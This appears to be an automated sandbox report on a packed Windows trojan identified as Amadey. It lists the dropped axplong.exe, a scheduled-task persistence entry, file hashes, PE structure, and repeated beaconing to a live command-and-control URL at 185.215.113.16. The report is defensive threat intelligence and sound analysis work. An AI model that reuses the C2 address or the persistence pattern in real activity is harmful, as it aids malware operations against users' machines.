                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe55%ReversingLabsWin32.Packed.Themida
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe55%ReversingLabsWin32.Packed.Themida
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/Jo89Ku7d/index.php)G100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php$100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php.100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php;100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php:V100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpB100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpf100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudmalware
                    http://185.215.113.16/Jo89Ku7d/index.phpded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpg100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpw100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedh100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpq100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded100%Avira URL Cloudphishing
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.php.axplong.exe, 00000006.00000002.2996262320.00000000015E8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php)Gaxplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php:Vaxplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpgaxplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpfaxplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php$axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpBaxplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php;axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=axplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpwaxplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedhaxplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpqaxplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.16
                    unknownPortugal
                    206894WHOLESALECONNECTIONSNLtrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1520351
                    Start date and time:2024-09-27 08:39:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 55s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target axplong.exe, PID 2536 because there are no executed function
                    • Execution Graph export aborted for target axplong.exe, PID 2892 because there are no executed function
                    • Execution Graph export aborted for target file.exe, PID 6912 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe
                    TimeTypeDescription
                    02:41:02API Interceptor281368x Sleep call for process: axplong.exe modified
                    07:40:09Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.16file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, DarkTortillaBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                    • 185.215.113.103
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    No context
                    No context
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1882624
                    Entropy (8bit):7.949673884409674
                    Encrypted:false
                    SSDEEP:49152:kxhfh3XzQERdB834wR6DOU6ivpU9SnCNO/GmkCzxX:w9pUqwcD1noShvx
                    MD5:FC16F8C6B738FBB7D1A03848329360EA
                    SHA1:27260A586B8511D4375F086210BD751B79E50B1B
                    SHA-256:40E3298B5E6B98F8B52A2AF928463A543E7F0A6DCA869565E8AC8AD867F3CE61
                    SHA-512:55DCCD477A2F35743FDDC72FDAE8A7C30CFCA356FF00857604152AFC9D9BE4856AA822321B8E822131F7D4E3E9FF9E67020F63E712601F33201C86FAF876FD6D
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 55%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................`J...........@...........................J.....f.....@.................................W...k...........................,LJ..............................KJ..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...ttawmtnf......0.....................@...ozsesycy.....PJ.....................@....taggant.0...`J.."..................@...........................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):286
                    Entropy (8bit):3.4223639633311005
                    Encrypted:false
                    SSDEEP:6:MTtXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lb1ldt0:YpRKQ1lOmeeDHjzvYRQVRt0
                    MD5:5B25A23EDDD14C546110C9F5AB4049F3
                    SHA1:6E084DE9FCEC275FCEDD7D6132D55CABE184EEA4
                    SHA-256:188234C1D514205F2707E02F6D88689CB8458F864F26BCFA1E2E745D42EF2AF0
                    SHA-512:62B09730227E52E3C788FD014077D3C9B44E156D7BDE3F3834CB46B32A22892719D200B442886529D465EB409519F7C97928FB620C643A603D5242D39E871F91
                    Malicious:false
                    Reputation:low
                    Preview:.....b|..n4M....}.5!F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................).@3P.........................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.949673884409674
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'882'624 bytes
                    MD5:fc16f8c6b738fbb7d1a03848329360ea
                    SHA1:27260a586b8511d4375f086210bd751b79e50b1b
                    SHA256:40e3298b5e6b98f8b52a2af928463a543e7f0a6dca869565e8ac8ad867f3ce61
                    SHA512:55dccd477a2f35743fddc72fdae8a7c30cfca356ff00857604152afc9d9be4856aa822321b8e822131f7d4e3e9ff9e67020f63e712601f33201c86faf876fd6d
                    SSDEEP:49152:kxhfh3XzQERdB834wR6DOU6ivpU9SnCNO/GmkCzxX:w9pUqwcD1noShvx
                    TLSH:1A9533D709802B26C43C4A77F3728D3397392DC9B52C8DE96D0296FB5193FE6B980856
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x8a6000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007F9D11273C9Ah
                    sets byte ptr [eax+eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    jmp 00007F9D11275C95h
                    add byte ptr [edx], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], dh
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [edx], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx], al
                    add byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    or ecx, dword ptr [edx]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a4c2c0x10ttawmtnf
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4a4bdc0x18ttawmtnf
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x680000x2de008b97350477ae30f2a497c05d021eb50eFalse0.997264560626703OpenPGP Secret Key7.981060987625007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x690000x1e00x200b9d1858cc6dd5a1fb1dead601b986770False0.57421875data4.483142036160835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x6b0000x2a00000x2006477efef5a329169bc16ee5614052519unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    ttawmtnf0x30b0000x19a0000x199e00c337336ea205f73df5d52d2ec3736501False0.9947279324870387data7.953226597042887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    ozsesycy0x4a50000x10000x600a6dc26e052327773bb6a5c6cc8e43820False0.55078125data4.93535810745984IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4a60000x30000x220039e6d3f9e1f22c8ed7b45a7bba7f8bf6False0.05755974264705882DOS executable (COM)0.793755423191359IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4a4c3c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                    DLLImport
                    kernel32.dlllstrcpy
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-09-27T08:41:07.471680+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.453656185.215.113.1680TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 27, 2024 08:41:03.628830910 CEST5365380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:03.633761883 CEST8053653185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:03.633825064 CEST5365380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:03.634221077 CEST5365380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:03.638998985 CEST8053653185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:04.346273899 CEST8053653185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:04.346384048 CEST5365380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:04.348231077 CEST5365380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:04.353849888 CEST8053653185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:04.574336052 CEST8053653185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:04.574515104 CEST5365380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:04.687941074 CEST5365380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:04.688563108 CEST5365480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:04.693240881 CEST8053653185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:04.693341017 CEST5365380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:04.693350077 CEST8053654185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:04.693413019 CEST5365480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:04.693566084 CEST5365480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:04.698322058 CEST8053654185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:05.390173912 CEST8053654185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:05.390383005 CEST5365480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:05.395132065 CEST5365480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:05.400007963 CEST8053654185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:05.621922016 CEST8053654185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:05.622123003 CEST5365480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:05.734651089 CEST5365480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:05.735002041 CEST5365580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:05.740528107 CEST8053655185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:05.740772963 CEST8053654185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:05.740910053 CEST5365480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:05.741049051 CEST5365580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:05.741049051 CEST5365580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:05.746125937 CEST8053655185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:06.437556982 CEST8053655185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:06.437619925 CEST5365580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:06.439991951 CEST5365580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:06.445702076 CEST8053655185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:06.662950993 CEST8053655185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:06.663022041 CEST5365580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:06.766298056 CEST5365580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:06.767013073 CEST5365680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:06.771562099 CEST8053655185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:06.771624088 CEST5365580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:06.771915913 CEST8053656185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:06.771985054 CEST5365680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:06.772139072 CEST5365680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:06.776945114 CEST8053656185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:07.471334934 CEST8053656185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:07.471679926 CEST5365680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:07.478423119 CEST5365680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:07.483236074 CEST8053656185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:07.706590891 CEST8053656185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:07.706664085 CEST5365680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:07.812812090 CEST5365680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:07.813123941 CEST5365780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:08.003304005 CEST8053657185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:08.003458977 CEST5365780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:08.003474951 CEST8053656185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:08.003530979 CEST5365680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:08.003845930 CEST5365780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:08.008603096 CEST8053657185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:08.723110914 CEST8053657185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:08.723181009 CEST5365780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:08.724097013 CEST5365780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:08.730210066 CEST8053657185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:08.945633888 CEST8053657185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:08.945720911 CEST5365780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:09.047111988 CEST5365780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:09.047575951 CEST5365880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:09.052212000 CEST8053657185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:09.052297115 CEST5365780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:09.052345037 CEST8053658185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:09.052424908 CEST5365880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:09.052608967 CEST5365880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:09.057544947 CEST8053658185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:09.846620083 CEST8053658185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:09.846820116 CEST5365880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:09.847716093 CEST5365880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:09.852526903 CEST8053658185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:10.082247019 CEST8053658185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:10.082401991 CEST5365880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:10.190747976 CEST5365880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:10.191410065 CEST5365980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:10.196185112 CEST8053658185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:10.196230888 CEST8053659185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:10.196300983 CEST5365880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:10.196352005 CEST5365980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:10.196779013 CEST5365980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:10.201545954 CEST8053659185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:10.907996893 CEST8053659185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:10.908091068 CEST5365980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:10.908673048 CEST5365980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:10.913407087 CEST8053659185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:11.139823914 CEST8053659185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:11.139930010 CEST5365980192.168.2.4185.215.113.16
